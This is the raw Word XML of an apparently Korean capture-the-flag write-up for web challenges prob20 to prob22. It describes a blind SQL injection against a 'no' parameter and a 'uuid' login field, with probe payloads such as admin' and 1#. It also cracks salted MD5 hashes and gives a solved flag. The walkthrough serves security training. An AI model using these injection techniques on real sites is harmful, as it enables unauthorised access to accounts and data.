      </w:r>
    </w:p>
    <w:p w:rsidR="00820856" w:rsidRPr="00820856" w:rsidRDefault="00820856" w:rsidP="00820856">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39B912D6" wp14:editId="56E45568">
            <wp:extent cx="1181100" cy="295275"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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2779BBA2" wp14:editId="57FC5E18">
            <wp:extent cx="5731510" cy="313690"/>
            <wp:effectExtent l="0" t="0" r="254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>오류가 존재하는 문제이다.</w:t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rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00820856">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob20</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00820856" w:rsidRDefault="00820856" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FA5C965" wp14:editId="29F5B464">
            <wp:extent cx="3400425" cy="1400175"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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1E0A0D5C" wp14:editId="5F191DE7">
            <wp:extent cx="5731510" cy="4599940"/>
            <wp:effectExtent l="0" t="0" r="254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F" w:rsidRDefault="00C32F4F" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>모든 값이 비어 있으면 안되고,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:t>ack.value</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">와 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>attackme.value</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>는 같아야 한다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D547A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>캡챠</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D547A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 같은 느낌이다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00820856" w:rsidRDefault="00C32F4F" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A270F5C" wp14:editId="4D055CBE">
            <wp:extent cx="828675" cy="295275"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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F" w:rsidRDefault="00C32F4F" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">타임 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>리미트가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라고 합니다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">시도해보면 </w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>초인 것을 알 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D547A9" w:rsidRDefault="00D547A9" w:rsidP="00D547A9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2149D96C" wp14:editId="43A2561C">
            <wp:extent cx="1524000" cy="828675"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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준비 한</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 후</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D547A9" w:rsidRDefault="00D547A9" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69FFDAD7" wp14:editId="104BD34D">
            <wp:extent cx="4000500" cy="504825"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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2F582E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>ttackme</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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를 </w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>으로 바꾼다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D547A9" w:rsidRDefault="00D547A9" w:rsidP="002F582E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DBEB635" wp14:editId="4C41C20C">
            <wp:extent cx="4171950" cy="1514475"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D547A9">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00D547A9">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob21</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D547A9" w:rsidRDefault="00D547A9" w:rsidP="00D547A9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63DD4D87" wp14:editId="1D49A2D4">
            <wp:extent cx="3486150" cy="169545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r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">을 입력하면 </w:t>
      </w:r>
      <w:r w:rsidR="004F6C79">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="004F6C79">
        <w:t>rue,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F6C79" w:rsidRDefault="004F6C79" w:rsidP="00D547A9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2를 입력해도 </w:t>
      </w:r>
      <w:r>
        <w:t>True,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F6C79" w:rsidRDefault="004F6C79" w:rsidP="00D547A9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>다른 것은 찾지 못했다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F6C79" w:rsidRDefault="004F6C79" w:rsidP="00D547A9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">값이 있으면 </w:t>
      </w:r>
      <w:r>
        <w:t>Result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가 되는 구조인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</w:p>
    <w:p w:rsidR="004F6C79" w:rsidRDefault="004F6C79" w:rsidP="00D547A9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">elect no, id, pw from prob21 where </w:t>
      </w:r>
      <w:r w:rsidR="00316360">
        <w:t>no=</w:t>
      </w:r>
      <w:r w:rsidR="009F6F7E">
        <w:t>$_GET[no]</w:t>
      </w:r>
      <w:r w:rsidR="00316360">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>와 같은 구조로 추측해 볼 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00316360" w:rsidRDefault="00316360" w:rsidP="00D547A9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0959D215" wp14:editId="1ECF5D89">
            <wp:extent cx="4800600" cy="21717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0" w:rsidRDefault="00316360" w:rsidP="00D547A9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>o=1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의 길이는 </w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00316360" w:rsidRDefault="00316360" w:rsidP="00D547A9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C40FD8D" wp14:editId="53B8CA8E">
            <wp:extent cx="4343400" cy="2200275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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0" w:rsidRDefault="00316360" w:rsidP="00D547A9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>o=2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의 길이도 </w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF786F" w:rsidRDefault="00BF786F" w:rsidP="00D547A9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AD2F633" wp14:editId="03850A31">
            <wp:extent cx="3305175" cy="2200275"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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6F" w:rsidRDefault="00BF786F" w:rsidP="00D547A9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>o=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">의 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">pw </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">길이는 </w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF786F" w:rsidRDefault="00BF786F" w:rsidP="00D547A9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25208C38" wp14:editId="5722045C">
            <wp:extent cx="2933700" cy="2162175"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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6F" w:rsidRDefault="00BF786F" w:rsidP="00D547A9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>o=2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">의 </w:t>
      </w:r>
      <w:r>
        <w:t>pw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 길이는 </w:t>
      </w:r>
      <w:r>
        <w:t>19</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF786F" w:rsidRDefault="00BF786F" w:rsidP="00D547A9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">딱 보니 </w:t>
      </w:r>
      <w:r>
        <w:t>no = 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">은 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">guest, </w:t>
      </w:r>
      <w:r w:rsidR="00166BBE">
        <w:t>no = 2</w:t>
      </w:r>
      <w:r w:rsidR="00166BBE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>는 a</w:t>
      </w:r>
      <w:r w:rsidR="00166BBE">
        <w:t xml:space="preserve">dmin, </w:t>
      </w:r>
      <w:r w:rsidR="00166BBE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">즉 </w:t>
      </w:r>
      <w:r w:rsidR="00166BBE">
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidR="00166BBE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">의 </w:t>
      </w:r>
      <w:r w:rsidR="00166BBE">
        <w:t>pw</w:t>
      </w:r>
      <w:r w:rsidR="00166BBE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 f</w:t>
      </w:r>
      <w:r w:rsidR="00166BBE">
        <w:t>lag</w:t>
      </w:r>
      <w:r w:rsidR="00166BBE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 될 것 같다.</w:t>
      </w:r>
      <w:r w:rsidR="00166BBE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00166BBE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>구해보면</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00166BBE" w:rsidRDefault="00166BBE" w:rsidP="00D547A9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A473807" wp14:editId="7EAE6D08">
            <wp:extent cx="5731510" cy="3714750"/>
            <wp:effectExtent l="0" t="0" r="254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BE" w:rsidRDefault="00166BBE" w:rsidP="00D547A9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="463E1D75" wp14:editId="1E5BAF71">
            <wp:extent cx="2057400" cy="3867150"/>
            <wp:effectExtent l="0" t="0" r="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BE" w:rsidRDefault="00166BBE" w:rsidP="00D547A9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lag is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>blindsqlinjectionkk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00166BBE" w:rsidRDefault="00166BBE" w:rsidP="00D547A9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A96605C" wp14:editId="3E6B818E">
            <wp:extent cx="4191000" cy="1123950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Pr="002B2410" w:rsidRDefault="002B2410" w:rsidP="002B2410">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B2410">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>prob22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B2410" w:rsidRDefault="002B2410" w:rsidP="00D547A9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28FC652C" wp14:editId="59676707">
            <wp:extent cx="3514725" cy="2105025"/>
            <wp:effectExtent l="0" t="0" r="952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t>join</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">을 하고 </w:t>
      </w:r>
      <w:r>
        <w:t>login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 누르면</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B2410" w:rsidRDefault="002B2410" w:rsidP="00D547A9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5588AC8A" wp14:editId="57A34BDD">
            <wp:extent cx="2667000" cy="1657350"/>
            <wp:effectExtent l="0" t="0" r="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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>위와 같은 값이 나온다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B2410" w:rsidRDefault="002B2410" w:rsidP="00D547A9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D67F7C6" wp14:editId="51A8C2FE">
            <wp:extent cx="3619500" cy="80010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방식으로 전달되고,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">의 변수는 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">의 변수는 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">pw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2B2410" w:rsidRDefault="002B2410" w:rsidP="00D547A9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">비밀번호를 </w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">부터 </w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>까지 입력해 보면서 암호화된 값을 알아보면</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B2410" w:rsidRDefault="002B2410" w:rsidP="002B2410">
      <w:r>
        <w:t>1 -&gt; 2da2e5c19f56cd6959adc016a0b9c4db</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B2410" w:rsidRDefault="002B2410" w:rsidP="002B2410">
      <w:r>
        <w:t>2 -&gt; 0b09e6a9ad0249bb831cca9bb37528a3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B2410" w:rsidRDefault="002B2410" w:rsidP="002B2410">
      <w:r>
        <w:t>3 -&gt; d0c5f166420375686721c8f1f35a6f7d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B2410" w:rsidRDefault="002B2410" w:rsidP="002B2410">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이런 식이다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA0F2B" w:rsidRDefault="00DA0F2B" w:rsidP="002B2410">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01CE3CC3" wp14:editId="504979FF">
            <wp:extent cx="2905125" cy="533400"/>
            <wp:effectExtent l="0" t="0" r="9525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2B" w:rsidRDefault="00DA0F2B" w:rsidP="002B2410">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">길이가 </w:t>
      </w:r>
      <w:r>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>글자이다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> md5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 복호화 해보겠다</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA0F2B" w:rsidRDefault="00DA0F2B" w:rsidP="002B2410">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; 1zombie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA0F2B" w:rsidRDefault="00DA0F2B" w:rsidP="002B2410">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; 2zombie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA0F2B" w:rsidRDefault="00DA0F2B" w:rsidP="002B2410">
      <w:r>
        <w:t>3 -&gt; 3zombie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA0F2B" w:rsidRDefault="00DA0F2B" w:rsidP="002B2410">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="227074BC" wp14:editId="7233F709">
            <wp:extent cx="3514725" cy="847725"/>
            <wp:effectExtent l="0" t="0" r="9525" b="952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2B" w:rsidRDefault="00DA0F2B" w:rsidP="002B2410"/>
    <w:p w:rsidR="001742CE" w:rsidRDefault="001742CE" w:rsidP="002B2410"/>
    <w:p w:rsidR="001742CE" w:rsidRDefault="001742CE" w:rsidP="002B2410">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">의 </w:t>
      </w:r>
      <w:r w:rsidR="00516200">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">비밀번호를 알아야 하므로 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00516200">
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00516200">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 인젝션을 해야 한다. 패스워드는 복호화 함수와 함께 쓰이는 것 같으므로 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00516200">
        <w:t>uuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00516200">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00516200">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">변수에 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00516200">
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00516200">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00516200">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">블라인드 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00516200">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>인젝션을</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00516200">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 하여 패스워드를 알아낸다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00516200" w:rsidRDefault="00516200" w:rsidP="002B2410">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B207912" wp14:editId="658ACE25">
            <wp:extent cx="2552700" cy="409575"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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( </w:t>
      </w:r>
      <w:r w:rsidRPr="00516200">
        <w:t>admin</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00516200">
        <w:t xml:space="preserve">' and </w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00516200">
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00516200" w:rsidRDefault="00516200" w:rsidP="00516200">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D9B5602" wp14:editId="11A6744D">
            <wp:extent cx="1009650" cy="219075"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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a</w:t>
      </w:r>
      <w:r>
        <w:t>dmin</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>’ and 1# )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00516200" w:rsidRDefault="00516200" w:rsidP="00516200">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">거짓일 때 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Wrong!,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">참일 때 </w:t>
      </w:r>
      <w:r>
        <w:t>Wrong password</w:t>
      </w:r>
      <w:r w:rsidR="00EC5183">
        <w:t>!</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EC5183">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EC5183">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 출력하므로 블라인드 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EC5183">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>인젝션이</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EC5183">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 가능하다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E70BD" w:rsidRDefault="005E70BD" w:rsidP="00516200">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EDC806D" wp14:editId="1E294B93">
            <wp:extent cx="5731510" cy="2483485"/>
            <wp:effectExtent l="0" t="0" r="254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82" w:rsidRDefault="00A43782" w:rsidP="00516200">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F76F0AD" wp14:editId="29FC62EC">
            <wp:extent cx="3209925" cy="1428750"/>
            <wp:effectExtent l="0" t="0" r="9525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82" w:rsidRDefault="00A43782" w:rsidP="00516200">
      <w:r>
        <w:rPr>
